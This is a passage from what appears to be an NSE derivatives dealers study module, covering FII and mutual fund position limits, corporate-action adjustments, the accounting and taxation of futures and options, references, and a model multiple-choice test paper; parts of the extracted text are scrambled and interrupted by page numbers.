Such short and long positions in excess of the said limits are compared with the FIIs/MFs holding in stocks. such surplus is deemed to comprise of short and long positions in the same proportion of the total open positions individually.exceeding (in notional value) the FIIs/MF’s holding of cash. whichever is lower. For stocks having applicable market-wide position limit (MWPL) of Rs. cash etc in a specified format. 500 crores. the combined futures and options position limit is 20% of applicable MWPL and futures position cannot exceed 20% of the applicable MWPL or Rs. The position limit for sub-account is same as that of client level position limits. mutual funds shall be treated at par with a registered FII in respect of position limits in index futures. The position limits for Mutual Funds and its schemes shall be as under: 1. 150 crores. / MF scheme should not exceed the higher of: • 1% of the free float market capitalisation (in terms of number of shares). The FIIs should report to the clearing member (custodian) the extent of the FIIs holding of stocks. whichever is lower and within which stock futures position cannot exceed 10% of applicable MWPL or Rs. Failing to do so. T-bills and similar instruments before the end of the day. 2. Position limit for MFs in stock futures and options The gross open position across all futures and options contracts on a particular underlying security. Mutual funds will be considered as trading members like registered FIIs and the schemes of mutual funds will be treated as clients like sub-accounts of FIIs. the combined futures and options position limit is 20% of applicable MWPL or Rs. The clearing member (custodian) in turn should report the same to the exchange. cash. (a) and (b) above. For stocks having applicable market-wide position limit of less than Rs. of a sub-account of an FII. if the open positions of the FII/MF exceeds the limits as stated in point no. 500 crores or more. OR 96 . index options. T-bills and similar instruments. Position limit for MFs in index futures and options contracts A disclosure is required from any person or persons acting in concert who together own 15% or more of the open interest of all futures and options contracts on a particular underlying index on the Exchange. 50 crore whichever is lower. In this regards. government securities. government securities. At the level of the FII sub-account /MF scheme Mutual Funds are allowed to participate in the derivatives market at par with Foreign Institutional Investors (FII). is a violation of the rules and regulations and attracts penalty and disciplinary action. 3. Accordingly. 300 crores. The exchange monitors the FII position limits. stock options and stock futures contracts.
with respect to the trades executed/ open positions of the TMs/ Constituents. Similarly. 9. position. This will facilitate in retaining the relative status of positions namely in-the-money. on a daily basis. These adjustments shall be carried out on all open. with respect to the trades executed/ open positions of the constituents. splits. • Adjustments shall mean modifications to positions and/or contract specifications namely strike price. • The methodology for adjustment of corporate actions such as bonus. details in respect of such margin amount due and collected. • Adjustment for corporate actions shall be carried out on the last day on which a security is traded on a cum basis in the underlying cash market. merger/ de–merger. The various stock benefits declared by the issuer of capital are bonus. for the purpose of meeting margin requirements. warrants and secured premium notes and dividends. amalgamation. 9. market lot. stock splits and consolidations is as follows: – Strike price: The new strike price shall be arrived at by dividing the old strike 97 . from the TMs/ Constituents clearing and settling through them. hive–off. multiplier. at-the-money and out-of-money. and on which the CMs have allowed initial margin limit to the TMs. exercised as well as assigned positions. rights. These position limits are applicable on the combined position in all futures and options contracts on an underlying security on the Exchange. which the CMs have paid to NSCCL. TMs are required to report on a daily basis details in respect of such margin amount due and collected from the constituents clearing and settling through them. which the trading members have paid to the CMs. • The corporate actions may be broadly classified under stock benefits and cash benefits. This will also address issues related to exercise and assignments.• 5% of the open interest in the derivative contracts on a particular underlying stock (in terms of number of contracts). consolidations.3.5 Reporting of client margin Clearing Members (CMs) and Trading Members (TMs) are required to collect upfront initial margins from all their Trading Members/ Constituents. CMs are required to compulsorily report.
Adjustment factor: B/A Right: Ratio . New issue size : Y * (A+B)/B The above methodology may result in fractions due to the corporate action e. – Position: The new position shall be arrived at by multiplying the old position by the adjustment factor. the strike price would be adjusted.g. shall be decided in the manner laid down by the group by adjusting strike price or market lot. which will be computed using the pre-specified methodology.price by the adjustment factor as under. so that no forced closure of open position is mandated. stock splits and consolidations is arrived at as follows: – – – Bonus: Ratio . Compute value of the position based on the revised strike price and market lot. 4. if any. Compute value of the position before adjustment. would be deemed to be ordinary dividends and no adjustment in the strike price would be made for ordinary dividends. With a view to minimizing fraction settlements.A:B . Compute value of the position taking into account the exact adjustment factor. • The exchange will on a case to case basis carry out adjustments for other corporate actions as decided by the group in conformity with the above guidelines. the following methodology is proposed to be adopted: 1. • Dividends which are below 10% of the market value of the underlying stock. The difference between 1 and 4 above.A:B. 2. – Market lot/multiplier: The new market lot/multiplier shall be arrived at by multiplying the old market lot by the adjustment factor as under. 3. For extra-ordinary dividends. The adjustment factor for bonus. a bonus ratio of 3:7. above 10% of the market value of the underlying stock. Carry out rounding off for the Strike Price and Market Lot. 98 . Adjustment factor: (A+B)/B Stock splits and consolidations: Ratio .A:B • • • • – Premium: C Face value: D Existing strike price: X New strike price: ((B * X) + A * (C + D))/(A+B) Existing market lot / multiplier / position: Y .
stock futures. index futures. a trade in equity index futures is similar to a trade in. a disclosure should be made in the notes to the financial statements of the client. 10.Equity index futures account”. and does not pose any peculiar accounting problems. should also be accounted for in the same manner. It would however be pertinent to keep oneself updated with the changes in accounting norms for derivatives by regularly cross checking the website of the Institute of Chartered Accountants of India (www. In cases where instead of paying initial margin in cash.Equity index futures account’ should be shown separately under the head ‘current assets’.1 Accounting for futures The Institute of Chartered Accountants of India (ICAI) has issued guidance notes on accounting of index futures contracts from the view point of parties who enter into such futures contracts as buyers or sellers. For other parties involved in the trading process. Initial margin paid/payable should be debited to “Initial margin . Additional margins. It may be mentioned that at the time when the contract is entered into for purchase/sale of equity index futures. Accounting at the inception of a contract Every client is required to pay to the trading member/clearing member. index options and stock options. trading members. clearing members and clearing corporations. the excess should be disclosed separately as a deposit under the head ‘current assets’. no entry is passed for recording the contract because no payment is made at that time except for the initial margin.org. the balance in the ‘Initial margin .CHAPTER 10: Accounting for Derivatives This chapter gives a brief overview of the process of accounting of derivative contracts namely.Equity index futures account”. chapter takes a quick relook at the terms used in derivatives markets and discusses the principles of taxation for these contracts. .). say shares. if any. the initial margin determined by the clearing corporation as per the bye-laws/regulations of the exchange for entering into equity index futures contracts. like brokers.icai. the client provides bank guarantees or lodges securities with the member. On the balance sheet date. In those cases where any amount has been paid in excess of the initial/additional margin.
Same accounting treatment should be made when a contract is squared-up by entering into a reverse contract. to the extent of the balance available in the provision account. the net amount received from the broker. the contract price of the contract so squared-up should be determined using First-In. may be shown under the head “current assets. “Deposit for mark-to-market margin account”. i. provision for anticipated loss.Equity index futures account”. First-Out (FIFO) method for calculating profit/loss on squaring-up. The debit balance in the said “mark-to-market margin . the profit/loss.e. so computed.Equity index futures account”) being anticipated profit should be ignored and no credit for the same should be taken in the profit and loss account. i. Accordingly. at present. where a balance exists in the provision account created for anticipated loss. say. should be calculated as the difference between final settlement price and contract prices of all the contracts in the series. which may be equivalent to the net payment made to the broker (represented by the debit balance in the “mark-to-market margin .Equity index futures account”. loans and advances” in the balance sheet and the provision created there-against should be shown as a deduction therefrom. the credit balance in the said account.. should be recognized in the profit and loss account by corresponding debit/credit to “mark-to-market margin . It appears that. The amount of “markto-market margin” received/paid from such account should be credited/debited to “Mark-tomarket margin . and the balance of loss.daily basis.Equity index futures account” with a corresponding debit/credit to “Deposit for mark-to-market margin account”. On the other hand. Net amount received (represented by credit balance in the “mark-to-market margin . should be charged to the profit and loss account. net payment made to the broker. 100 . The profit/loss.Equity index futures account”) should be created by debiting the profit and loss account. on final settlement of the contracts in the series.. represents the net amount paid/ received on the basis of movement in the prices of index futures up to the balance sheet date. should be shown as a current liability under the head “current liabilities and provisions in the balance sheet”. However. if more than one contract in respect of the series of equity index futures contracts to which the squared-up contract pertains is outstanding at the time of the squaring of the contract. Accounting at the time of final settlement At the expiry of a series of equity index futures. if any. any balance in the “Deposit for markto-market margin account” should be shown as a deposit under the head “current assets”. Keeping in view ‘prudence’ as a consideration for preparation of financial statements. At the year-end. any loss arising on such settlement should be first charged to such provision account. it is not feasible to identify the equity index futures contracts.Equity index futures account”.e. Accounting for open positions Position left open on the balance sheet date must be accounted for. The amount so paid is in the nature of a deposit and should be debited to an appropriate account. Debit/credit balance in the “mark-to-market margin .
Disclosure requirements The amount of bank guarantee and book value as also the market value of securities lodged should be disclosed in respect of contracts having open positions at the year end. such account should be shown separately under the head ‘Current Assets’.. number of units of equity index futures pertaining to those contracts and the daily settlement price as of the balance sheet date should be disclosed separately for long and short positions. The number of equity index futures contracts having open position. and a corresponding debit should be given to the bank account or the deposit account (where the amount is not received). the amount to be paid on daily settlement exceeds the initial margin the excess is a liability and should be shown as such under the head ‘current liabilities and provisions’.2 Accounting for options The Institute of Chartered Accountants of India issued guidance note on accounting for index options and stock options from the view point of the parties who enter into such contracts as buyers/holder or sellers/writers.Equity index futures account”. The amount of initial margin on the contract. as the case may be. will be released. The buyer/holder of the 101 . in respect of each series of equity index futures. the contract is closed out.Equity index futures account” with a corresponding credit to “Initial margin . The amount not paid by the Client is adjusted against the initial margin. The accounting treatment in this regard will be the same as explained above. 10. Such initial margin paid would be debited to ‘Equity Index Option Margin Account’ or to ‘Equity Stock Option Margin Account’. where initial margin money has been paid by way of bank guarantee and/or lodging of securities. In the books of the Client. the amount so adjusted should be debited to “mark-to-market .Equity index futures account”. the initial margin paid in respect of the contract is released which should be credited to “Initial margin . In case. Total number of contracts entered and gross number of units of equity index futures traded (separately for buy/sell) should be disclosed in respect of each series of equity index futures. In the balance sheet. The amount of profit or loss on the contract so closed out should be calculated and recognized in the profit and loss account in the manner dealt with above. in excess of the amount adjusted against the mark-to-market margin not paid.On the settlement of equity index futures contract. if it continues to exist on the balance sheet date.
such premium received should be credited to ‘Equity Index Option Premium Account’ or ‘Equity Stock Option Premium Account’ as the case may be. In such case. In his books. At the end of the year the balance in this account would be shown as deposit under ‘Current Assets’. with a corresponding debit to profit and loss account. Sometimes. In the books of the seller/writer. as the case may be.’. such premium would be debited to ‘Equity Index Option Premium Account’ or ‘Equity Stock Option Premium Account’. as the case may be. as the case may be. Accounting for open positions as on balance sheet dates The ‘Equity Index Option Premium Account’ and the ‘Equity Stock Option Premium Account’ should be shown under the head ‘Current Assets’ or ‘Current Liabilities’. This provision should be credited to ‘Provision for Loss on Equity Index Option Account’ or to the ‘Provision for Loss on Equity Stock Option Account’. The provision made as above should be shown as deduction from ‘Equity Index Option Premium’ or ‘Equity Stock Option Premium’ which is shown under ‘Current Assets’. the amount of margin paid/received from/into such accounts should be debited/credited to the ‘Deposit for Margin Account’.’. In the books of the buyer/holder. 102 . the client deposit a lump sum amount with the trading/clearing member in respect of the margin instead of paying/receiving margin on daily basis. the same should be adjusted against the provision required in the current year and the profit and loss account be debited/credited with the balance provision required to be made/excess provision written back. He is required to pay the premium.option is not required to pay any margin. as the case may be. as the case may be. The provision so created should be credited to ‘Provision for Loss on Equity Index Option Account’ to the ‘Provision for Loss on Equity Stock Options Account’. the provision should be made for the amount by which premium prevailing on the balance sheet date exceeds the premium received for that option. a provision should be made for the amount by which the premium paid for the option exceeds the premium prevailing on the balance sheet date. In case of any opening balance in the ‘Provision for Loss on Equity Stock Options Account’ or the ‘Provision for Loss on Equity Index Options Account’.
At the time of final settlement. For a call option the buyer/holder will receive equity shares for which the call option was entered into. Following are the guidelines for accounting treatment in case of delivery settled index options and stock options: The accounting entries at the time of inception. The buyer/holder should credit the relevant equity shares account and debit cash/bank. Such payment will be recognized as a loss. The seller/writer should debit the relevant equity shares account and credit cash/bank. Apart from the above. the seller/writer will pay the adverse difference. the buyer/holder will recognize premium as an expense and debit the profit and loss account by crediting ‘Equity Index Option Premium Account’ or ‘Equity Stock Option Premium Account’. For a put option the seller/writer will receive equity shares for which the put option was entered into. if any. between the final settlement price as on the exercise/expiry date and the strike price. Similarly. Accounting at the time of squaring off an option contract The difference between the premium paid and received on the squared off transactions should be transferred to the profit and loss account. which will be recognized as income. margin paid towards such option would be released by the exchange. As soon as an option gets exercised. which should be credited to ‘Equity Index Option Margin Account’ or to ‘Equity Stock Option Margin Account’. between the final settlement price as on the exercise/expiry date and the strike price. If the option is exercised then shares will be transferred in consideration for cash at the strike price.’. the buyer/holder will deliver equity shares for which the put option was entered into. The seller/writer should credit the relevant equity shares account and debit cash/bank. 103 . The buyer/holder should debit the relevant equity shares account and credit cash/bank. the premium paid/received will be transferred to the profit and loss account. and the bank account will be debited. For a put option. On exercise of the option. Apart from the above. the buyer/holder will receive favorable difference.Accounting at the time of final settlement On exercise of the option. the accounting entries for which should be the same as those in case of cash settled options. as the case may be. if any. if an option expires un-exercised then the accounting entries will be the same as those in case of cash settled options. for a call option the seller/writer will deliver equity shares for which the call option was entered into. In addition to this entry.
In view of the above provisions. The tax provisions provided for differential treatment with respect to set off and carry forward of loss on such transactions. Finance Act.1 Taxation of Profit/Loss on derivative transaction in securities Prior to Financial Year 2005–06. where option is exercised 3. Thus. the following STT rates are applicable w. 2) Act. 2008 in relation to sale of a derivative. most of the transactions entered into in derivatives by investors and speculators were considered as speculative transactions. it can be carried forward to subsequent assessment year and set off against any other income of the subsequent year. including stocks and shares. Sale of a futures in securities 0. In case the same cannot be set off.10.3 Taxation of Derivative Transaction in Securities 10. Securities Transaction Tax (STT) is levied on all transactions of sale and/or purchase of equity shares and units of equity oriented fund and sale of derivatives entered into in a recognized stock exchange.125% 0. such transactions entered into by hedgers and stock exchange members in course of jobbing or arbitrage activity were specifically excluded from the purview of definition of speculative transaction. However. Such losses can be carried forward for a period of 8 assessment years. No.2 Securities transaction tax on derivatives transactions As per Chapter VII of the Finance (No. 10.3. Sl. 1961. This implies that income or loss on derivative transactions which are carried out in a “recognized stock exchange” is not taxed as speculative income or loss.017% Payable by Seller 104 . This is in view of section 43(5) of the Income-tax Act which defined speculative transaction as a transaction in which a contract for purchase or sale of any commodity. As per Finance Act 2008. Taxable securities transaction Sale of an option in securities Sale of an option in securities.f. It may also be noted that securities transaction tax paid on such transactions is eligible as deduction under Income-tax Act. transaction in derivatives were considered as speculative transactions for the purpose of determination of tax liability under the Income-tax Act. is periodically or ultimately settled otherwise than by the actual delivery or transfer of the commodity or scrips. 2004. Loss on derivative transactions could be set off only against other speculative income and the same could not be set off against any other income.3. 1st June.e.017% Purchaser Seller Rate 0. loss on derivative transactions can be set off against any other income during the year. where the transaction of such sale in entered into in a recognized stock exchange. This resulted in payment of higher taxes by an assessee. 1 2. 2005 has amended section 43(5) so as to exclude transactions in derivatives carried out in a “recognized stock exchange” for this purpose.
Irwin Stulz. Risk Management and Derivatives.00. 5. Note: Total futures contract value = 1000 x 300 = Rs. Strong. (2003).. Indian Securities Market Review John Kolb. Futures. Futures and options Terry J. 290.. The spot price of the share is Rs. References: 1. 300. Prentice Hall India: New Delhi 4. Morgan J. 8. 18. 10.Consider an example. The securities transaction tax thereon would be calculated as follows: 1. Derivatives.017% = Rs. Derivatives and Risk Management Basics. 3. Regulatory framework for financial derivatives in India Prof. 13. Brooks Robert (2008). Thomson Asia: Singapore Ajay Shah and Susan Thomas. Derivatives FAQ Leo Melamed. Watsham. Whaley. (2009). Financial Risk Manager Handbook Risk (5th ed.000 Securities transaction tax payable thereon 0.00. Options and Swaps. Risk Metrics. options and swaps National Stock Exchange.017% = 3. Escape to Futures Hans R. Futures. Risk containment in the derivatives market Mark Rubinstein. Chance. Thomson South Western: Cincinnati 7. (3rd ed.000 x 0. 17. Rubinstein on derivatives 105 . Varma & Group. Phillipe. XYZ Ltd. R. 51 No tax on such a transaction is payable by the buyer of the futures contract. Robert W. NSENEWS David A.) New Jersey: John Wiley 2. (2007) Futures. (Lot Size: 1000) expiring on 29-Sep-2005 for Rs. Options and Other Derivatives (2009) (7th ed). 9. 6. 12. John C. 3. C. Rene M. 16. Robert A. Cengage Learning: New Delhi. Options and financial future: Valuation and uses Dr. Gupta Committee. 19.An Introduction. Dubofsky. Mr. Kolb.Stoll and Robert E. Jorion. 2. 15. J. M. Futures and options in risk management Robert W. P. sells a futures contract of M/s. 11. 14. Don.. L.) Blackwell: Malden. A. (2006). MA Hull. Kolb. Introduction to futures and options markets National Stock Exchange..
com. 22. Rules.derivativesindia.com. 21.gov.in 106 . (F &O segment) of NSE & NSCCL Robert W. Understanding futures markets Websites • • • • • • •. Kolb.igidr.nseindia. regulations and bye–laws.com.
[2 Marks] (a) (b) FALSE TRUE [3 Marks] Q. An American style call option contract on the Nifty index with a strike price of 3040 expiring on the 30th June 2008 is specified as ’30 JUN 2008 3040 CA’.4 All open positions in the index futures contracts are daily settled at the (a) (b) (c) (d) mark-to-market settlement price net settlement price opening price closing price Q.1 Theta is also referred to as the _________ of the portfolio (a) (b) (c) (d) Q.MODEL TEST PAPER DERIVATIVES MARKET DEALERS MODULE Q.3 Clearing Members (CMs) and Trading Members (TMs) are required to collect upfront initial margins from all their Trading Members/Constituents.5. (a) (b) (c) (d) more liquid contracts far month middle month near month 107 .6 Usually. open interest is maximum in the _______ contract. [2 Marks] (a) (b) FALSE TRUE [2 Marks] Q.
9 An order which is activated when a price crosses a limit is _________ in F&O segment of NSEIL. futures contracts at Rs.000 loss of Rs. 10. client. On the last Thursday of the month.5.7 An equity index comprises of ______. (a) (b) (c) (d) basket of stocks basket of bonds and stocks basket of tradeable debentures None of the above [1 Mark] Q. 5.Q.000 loss of Rs. market and FII levels respectively. and sells ten one-month ABC Ltd. A copper fabricator entering into futures contracts to buy his annual requirements of copper. (assume one lot = 100) [2 Marks] (a) (b) (c) (d) Profit of Rs.100 profit of Rs. 10.8 Position limits have been specified by _______ at trading member.100 108 . [1 Mark] (a) (b) (c) (d) stop loss order market order fill or kill order None of the above [1 Mark] Q. He makes a _________.510. closes at Rs. 5. [2 Marks] (a) (b) (c) (d) Sub brokers Brokers SEBI RBI Q.11 An investor is bearish about ABC Ltd.10 Which of the following is not a derivative transaction? (a) (b) (c) (d) An investor buying index futures in the hope that the index will go up.00. A farmer selling his crop at a future date An exporter selling dollars in the spot market Q.000. ABC Ltd.
12 The interest rates are usually quoted on : (a) (b) (c) (d) Per Per Per Per annum basis day basis week basis month basis [2 Marks] Q. [2 Marks] (a) (b) (c) (d) Rs. Ram buys 100 calls on a stock with a strike of Rs.50/call.150 Q.200. 1870.200 Rs. 1890. 2 and 3 months expiry with strike prices of 1850.16 In the Black-Scholes Option Pricing Model. when S becomes very large a call option is almost certain to be exercised [2 Marks] (a) (b) FALSE TRUE Q.15 There are no Position Limits prescribed for Foreign Institutional Investors (FIIs) in the F&O Segment. 1880. He pays a premium of Rs.000 Rs. [1 Mark] (a) (b) TRUE FALSE Q.13 After SPAN has scanned the 16 different scenarios of underlying market price and volatility changes.300. it selects the ________ loss from among these 16 observations [2 Marks] (a) largest (b) 8th smallest (c) smallest (d) average Mr.10.6. A month later the stock trades in the market at Rs. 1900. 1860. How many different options contracts will be tradable? [2 Marks] (a) (b) (c) (d) 27 42 18 24 109 .Q.1.1. 1910.17 Suppose Nifty options trade for 1.000 Rs.1.14 Q. Upon exercise he will receive __________.1.
21 The favorable difference received by buyer/holder on the exercise/expiry date.23 110 . transaction in derivatives were considered as speculative transactions for the purpose of determination of tax liability under the Income-tax Act [1 Mark] (a) (b) TRUE FALSE [3 Marks] Q. (a) (b) (c) (d) A unique CP code An order identifier A PIN number A trade identifier Q.19 ______ is allotted to the Custodial Participant (CP) by NSCCL. [1 Mark] (a) (b) TRUE FALSE Q.20 An interest rate is 15% per annum when expressed with annual compounding.75% Q. except [2 Marks] (a) Individual warrant options (b) Index based futures (c) Index based options (d) Individual stock options Derivative is defined under SC(R)A to include : A contract which derives its value from the prices. of underlying securities. What is the equivalent rate with continuous compounding? [2 Marks] (a) (b) (c) (d) 14% 14.50% 13.22 Q. or index of prices.98% 14.18 Prior to Financial Year 2005 . will be recognized as ___________ [2 Marks] (a) Income (b) Expense (c) Cannot say (d) None The F&O segment of NSE provides trading facilities for the following derivative instruments. between the final settlement price as and the strike price.06.Q.
futures contracts at Rs. He makes a _________.futures contracts 10 ABC Ltd. On the last Thursday of the month. 6. 5000 Q. the index closed at 5100. 9000 Loss of Rs. 6. [2 Marks] (a) (b) (c) (d) users trading members clearing members participants Q. How much profit/loss did he make ? [2 Marks] (a) (b) (c) (d) Profit of Rs.futures contracts 5 ABC Ltd.6.26 Manoj owns five hundred shares of ABC Ltd.24 The risk management activities and confirmation of trades through the trading system of NSE is carried out by _______. . he gets uncomfortable with the price movements.600. 9500 Loss of Rs. On 25th January.000 coupled with a short Nifty position of Rs.futures contracts 10 ABC Ltd.06. Around budget time.250.Q.000 Loss of Rs. 200. 8. Which of the following will give him the hedge he desires (assuming that one futures contract = 100 shares) ? [1 Mark] (a) (b) (c) (d) Buy Sell Sell Buy 5 ABC Ltd.000.futures contracts Q.3. Each Nifty futures contract is for delivery of 50 Nifties. Tata Motors closes at Rs.25 A dealer sold one January Nifty futures contract for Rs.100.000. A person has a long Jet Airways position of Rs.000 Profit of Rs.000 Loss of Rs. 8000 Loss of Rs.27 An investor is bearish about Tata Motors and sells ten one-month ABC Ltd.000 on 15th January. 8. (assume one lot = 100) [2 Marks] (a) (b) (c) (d) Profit of Rs.28 The beta of Jet Airways is 1.000 Q.
Assuming 1 contract = 100 shares. [1 Mark] (a) (b) (c) (d) Rs.18.000 Q. 90.950 Rs. 2 and 3 months expiry with strike prices of 85. How many different options contracts will be tradable? [2 Marks] (a) (b) (c) (d) 18 32 21 42 [2 Marks] Q.210. (a) (b) (c) (d) SEBI any exchange a recognized stock exchange any stock exchange [1 Mark] Q.000 Rs. 100. 105.31 A stock broker means a member of_______.30 The bull spread can be created by only buying and selling (a) (b) (c) (d) basket option futures warrant options Q. Three months later.29 Suppose a stock option contract trades for 1.19.500 Rs.32 Ashish is bullish about HLL which trades in the spot market at Rs. 110.05 per call.Q. 115.20. HLL closes at Rs.10. his profit on the position is ____.1. 250. He buys 10 three-month call option contracts on HLL with a strike of 230 at a premium of Rs.34 . 95.
foreign currency futures based on new floating exchange rate system were introduced at the Chicago Mercantile Exchange [1 Mark] (a) (b) (c) (d) 1970 1975 1972 1974 113 .Q.37 Q. The end of day settlement price was Rs. as the case may be [2 Marks] (a) (b) (c) (d) Debited Credited Depends None Q. the premium paid would be ___________ to ‘Equity Index Option Premium Account’ or ‘Equity Stock Option Premium Account’. 1220.35 In the books of the buyer/holder of the option. 1221. He bought 1500 units @Rs.39 In which year.38 Trading member Shantilal took proprietary purchase in a March 2000 contract.1200 and sold 1400 @ Rs. What is the outstanding position on which initial margin will be calculated? [1 Mark] (a) (b) (c) (d) 300 200 100 500 units units units units.44 The value of a call option ___________ with a decrease in the spot price.43 Q. [1 Mark] (a) 35 (b) 15 (c) 5 (d) 1 114 .42 Q.41 With the introduction of derivatives the underlying cash market witnesses _______ [1 Mark] (a) lower volumes (b) sometimes higher.Q. [2 Marks] (a) (b) (c) (d) increases does not change decreases increases or decreases Q. [1 Mark] (a) (b) TRUE FALSE Q.
One contract on Reliance is equivalent to 100 shares. 100. the hierarchy amongst users comprises of _______. [2 Marks] (a) (b) (c) (d) Two-month expiry cycles Four month expiry cycles Three-month expiry cycles One-month expiry cycles Q. BANK Nifty.50 Q. branch manager The open position for the proprietary trades will be on a _______ (a) (b) net basis gross basis [3 Marks] Q. dealer. Rs. Nifty Midcap 50 and Mini Nifty futures contracts having all the expiry cycles. 98. Which of the following will give him the hedge he desires? [2 Marks] (a) (b) (c) (d) Buy Sell Sell Buy 5 Reliance futures contracts 10 Reliance futures contracts 5 Reliance futures contracts 10 Reliance futures contracts Q.250 Lakh Rs.46 NSE trades Nifty.49 In the NEAT F&O system.Q. [2 Marks] (a) branch manager. Rs. 6 5 2 4 Q. An investor buys the Option contract. Call Option Strike Price = Rs. Around budget time. [1 Mark] (a) (b) (c) (d) Rs.51 The minimum networth for clearing members of the derivatives clearing corporation/ house shall be __________ [2 Marks] (a) (b) (c) (d) Rs. branch manager (d) corporate manager. Net profit for the Buyer of the Option is ___. Premium = Rs.48 Spot Price = Rs.300 Lakh Rs. he gets uncomfortable with the price movements. 108.500 Lakh None of the above 115 .47 An investor owns one thousand shares of Reliance. 4. except. dealer (c) dealer. Rs. corporate manager. On Expiry of the Option the Spot price is Rs. CNX IT. branch manager. dealer. corporate manager (b) corporate manager.
[3 Marks] (a) closing price of futures contract (b) opening price of futures contract (c) closing spot index value (d) opening spot index value Premium Margin is levied at ________ level.0. [1 Mark] (a) (b) (c) (d) (e) Certified Financial Analyst MBA (Finance) NCFM Chartered Accountancy Not Attempted [1 Mark] Q.52 The Black-Scholes option pricing model was developed in _____.55 In the Black-Scholes Option Pricing Model. as S becomes very large. (a) (b) (c) (d) client clearing member broker trading member [1 Mark] Q.Q. (a) (b) (c) (d) 1923 1973 1887 1987 [2 Marks] Q. (a) (b) (c) (d) allows one to enter spread trades does not allow spread trades allows only a single order placement at a time None of the above 116 . the daily settlement price is the ______.56 To operate in the derivative segment of NSE. both N(d1) and N(d2) are both close to 1. [2 Marks] (a) (b) FALSE TRUE Q. the dealer/broker and sales persons are required to pass _________ examination.53 In the case of index futures contracts.54 Q.57 The NEAT F&O trading system ____________.
58 Margins levied on a member in respect of options contracts are Initial Margin. 795 Rs.60 117 . Market Interest rate = 12% and dividend expected is 6%? [2 Marks] (a) (b) (c) (d) Rs. 845 None of these Q.750.59 American option are frequently deduced from those of its European counterpart [1 Mark] (a) FALSE (b) TRUE Which of the following is closest to the forward price of a share price if Cash Price = Rs. Premium Margin and Assignment Margin [1 Mark] (a) (b) TRUE FALSE Q.Q. Futures Contract Maturity = 1 year from date. 705 Rs.. | https://www.scribd.com/doc/68985845/DMDM-rev | CC-MAIN-2018-05 | refinedweb | 35,094 | 58.89 |
Hi Team,
I am using secured environment where python code is working fine but after converting the code to .exe file using pyinstaller it giving below error.
Code for connecting to pod
from ucsmsdk.ucshandle import UcsHandle
handle = UcsHandle("n.n.n.n", "username", "password")
handle.login()
Trials:
1. I have ran .exe file from windows 2012 R2 and 2016 servers but it's populating 'Not a supported server' error(FYI., it's working fine if I ran it using .py file with the same code).
2. I have also tried from my virtual desktop directly still getting "urlopen error tunnel connection failed: 400 bad request".
3. If I add ip as instead of n.n.n.n then "urlopen error[errormo 11004] getaddrinfo failed" is getting populated.
Kindly let me know why it's not connecting through exe file and how can we overcome from this issue.
Thanks in advance | https://community.cisco.com/t5/cisco-developed-ucs-integrations/unable-to-connect-to-ucs-manager-using-ucsmsdk-after-converting/m-p/4038569 | CC-MAIN-2021-21 | refinedweb | 151 | 70.7 |
Are there situations in which
sys.stdout.write()
sys.stdout, but you can pass a file for example:
print >> open('file.txt', 'w'), 'Hello', 'World', 2+3
In Python 3.x,
sys.stdout. See.
In Python 2.6+,
from __future__ import print_function
Update: There is a little difference between the print function and the print statement (and more generally between a function and a statement) pointed by Bakuriu in comments.
In case of error when evaluating arguments:
print "something", 1/0, "other" #prints only something because 1/0 raise an Exception print("something", 1/0, "other") #doesn't print anything. The func is not called | https://codedump.io/share/JCht7Z4GQIXr/1/python---the-difference-between-sysstdoutwrite-and-print | CC-MAIN-2016-50 | refinedweb | 105 | 66.74 |
Hey , guys . Just wanna release something small and really useful You had been known about grabbing userids from facebook groups , profiles etc. You had to scroll down to the end of the page or just press the end button. I wrote a code , which u can use for this purpose. The code is written in c++ , just use a compiler to compile it PHP: #include "iostream" #include "windows.h" using namespace std;int main(){ INPUT key; key.type = INPUT_KEYBOARD, key.ki.time = 0; key.ki.wScan = 0; key.ki.dwExtraInfo = 0; key.ki.wVk = 0x23; key.ki.dwFlags = 0; while (1){ Sleep(1000); // <- TIME IN MILLIESECONDS cout << "Pressing END-Button" << endl; SendInput(1, &key, sizeof(key)); } return 0;} Leave a thank if it helped u, maybe im gonna code an automated grabber or something like that. | https://www.blackhatworld.com/seo/useful-faceook-end-button-clicker.700664/ | CC-MAIN-2017-39 | refinedweb | 136 | 77.43 |
In this article, you are going to learn about how to install TensorFlow on Raspberry Pi.
Originally developed by the Google Brain team to conduct machine learning and deep neural networks research, TensorFlow is general enough to be applicable in a wide variety of other domains.
TensorFlow is an open-source machine learning software library for numerical computation using data flow graphs. The graph nodes represent mathematical operations, while the graph edges represent the multi-dimensional data arrays (tensors) that flow between them. This flexible architecture gives you the ability to deploy computation to one or more CPUs or GPUs in a desktop, server, or mobile device without rewriting code.
Installing TensorFlow on Your Raspberry Pi
Installing TensorFlow on Raspberry Pi used to be a frustrating task. However, with the newer versions of Google TensorFlow officially supported on Raspberry Pi, you just need a couple of commands to get it installed.
First, make sure that your Raspberry Pi is up to date by typing the following commands. These commands update the installed packages on your Raspberry Pi to the latest versions.
sudo apt-get update sudo apt-get upgrade
With your Raspberry Pi up to date, install Google TensorFlow by typing the following commands in the terminal:
sudo apt install libatlas-base-dev pip3 install tensorflow
Testing TensorFlow
Let’s double-check the installation. To check whether or not TensorFlow installed, try importing TensorFlow by typing
Python3
And then
import tensorflow
It might raise an error if you are using a Python version greater than 3.4. Just ignore this error — everything will work fine.
To check what version of TensorFlow you have, type following command:
Tensorflow.__version__
Hello World Example
Let’s write a simple code provided by Google for testing TensorFlow that will print hello world.
import tensorflow as tf hello = tf.constant('Hello, TensorFlow!') sess = tf.Session() print(sess.run(hello))
You should see “Hello, TensorFlow” printed.
If you are running Python 3.5, you will get several runtime warnings. The official TensorFlow tutorials acknowledge that this happens, and recommend you ignore it.
Installing the Image Classifier
First, create a new directory which saves the TensorFlow models.
mkdir tensorflow cd tensorflow
Now, clone the TensorFlow models repository in this new directory.
git clone
We are going to use the image classification example that comes with the models, so navigate to that folder:
cd models/tutorials/image/imagenet
Now run the script. It will feed the standard image of “panda” to the neural network which in return guesses what this image contains with a score.
python3 classify_image.py
Let’s give our own image to the neural network and see whether it can identify objects in the image or not.
I placed an image of a dog into the same folder we are already working in. Now I’ll run the script to see what it comes up with as a guess.
python3 classify_image.py –image_file=dog.jpg
It comes up with the following guesses:
As you can see, it recognized that the highest probability of this image was that of a pug. | https://maker.pro/raspberry-pi/tutorial/how-to-set-up-the-machine-learning-software-tensorflow-on-raspberry-pi | CC-MAIN-2019-35 | refinedweb | 515 | 53.1 |
If you build dotCMS from source code, dotCMS provides Functional tests with the source code which allow you to test the system against functional requirements. Functional tests are developed using user stories to ensure the end result of dotCMS processes (data, return values, outputs, etc.) match the expected user requirements and expectations.
Requirements
